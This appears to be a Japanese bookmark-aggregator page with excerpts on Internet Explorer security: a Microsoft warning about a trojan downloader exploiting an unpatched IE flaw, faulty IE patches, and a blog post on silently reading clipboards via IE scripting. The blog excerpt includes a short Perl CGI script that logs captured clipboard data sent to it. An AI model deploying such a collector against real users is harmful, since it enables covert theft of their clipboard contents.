パッチ未公開のIE脆弱性を突くマルウェアが出現--MSが警告
Microsoftは米国時間11月29日、ウェブブラウザ「Internet Explorer(IE)」に存在する脆弱性を突くマルウェアが出現したと、警告を発した。なお、この脆弱性を修正するパッチは公開されていない。 Microsoftによると、IEに存在するセキュリティ脆弱性を突き、PCにトロイの木馬をダウンロードする悪質なソフトウェアが、インターネット上に見つかったという。この「TrojanDownloader:Win32/Delf.DH」を検知/削除する機能は、同社が先頃発表したオンラインスキャンサービス「Windows Live Safety Center」に組み込まれている。 Microsoftはこの件について、セキュリティ勧告を公開し、「Windows Live Safety Centerにアクセスし、『Complete Scan』オプションを使用して、この悪質なソフトウェアおよ
あなたのクリップボードが盗まれる - Ceekz Logs
IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジェクトね。操作できる内容は、クリップボードにデータを読み込むこと(setData)、読み出すこと(getData)、消去すること(clearData)の3種類。 読み出すことも可能なんですよね。しかも、デフォルトでは、警告すら出ない。 以下のような、プログラムを準備しよう。 #!/usr/bin/perl use strict; my $file = '/tmp/cb.txt'; open (CB, ">> $file"); print CB "$ENV{'QUERY_STRING'}\n"; close (CB); print "Status: 301 Moved Permanently\n"; print "Location:
IE向けパッチに不具合--ActiveXやJavaを使ったサイトで問題発生のおそれ - CNET Japan
Microsoftから提供されている2件の「Internet Explorer(IE)」向けセキュリティアップデートにより、特定のカスタムアプリケーションを使用するウェブサイトの機能が損われる可能性があることが明らかになった。 同社は米国時間11月2日、ウェブサイトに掲載した2件の勧告を通して、同社がセキュリティ情報「MS05-038」および「MS05-052」で公開したパッチをインストールすると、上記の問題が発生することを明らかにした。 これらのパッチは、ActiveXコントロールと併用すると問題を引き起こす。ActiveXコントロールは、ウェブサイトをよりインタラクティブにするための単純なタスクを処理する、小さなプログラムだ。また、MS05-038で公開されたパッチは、Javaアプリケーションにも障害を及ぼすという。Microsoftは、これらのパッチがインストールされると、特定の方法
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
攻撃目的に悪用されないと思われていたIEの脆弱性に攻撃コードが出現
IE6のアドレスバーにエスケープ文字を含む文字列指定でエラーになる問題